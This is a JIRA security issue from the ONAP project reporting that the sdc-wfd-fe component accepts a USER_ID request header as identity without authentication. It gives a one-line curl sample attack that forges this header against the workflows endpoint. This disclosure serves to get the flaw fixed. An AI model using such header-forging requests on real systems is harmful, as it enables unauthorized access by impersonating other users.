Uploaded image for project: 'ONAP JIRA Security Issues'
  1. ONAP JIRA Security Issues
  2. OJSI-94

sdc-wfd-fe allows to impersonate any user by setting USER_ID

CloneClone+Clone++
    XMLWordPrintable

Details

    Description

      sdc-wfd-fe allows to impersonate any user by setting USER_ID in request
      header any without any authentication

       

      Sample attack:

      curl -H ’USER_ID: abcd’ -X GET http://<IP ADDR>:30256/wf/workflows

      Attachments

        Issue Links

          No reviews matched the request. Check your Options in the drop-down menu of this sections header.

          Activity

            People

              xuegao Xue Gao
              l.wrochna Łukasz Wrochna
              Votes:
              0 Vote for this issue
              Watchers:
              6 Start watching this issue

              Dates

                Created:
                Updated:
                Resolved: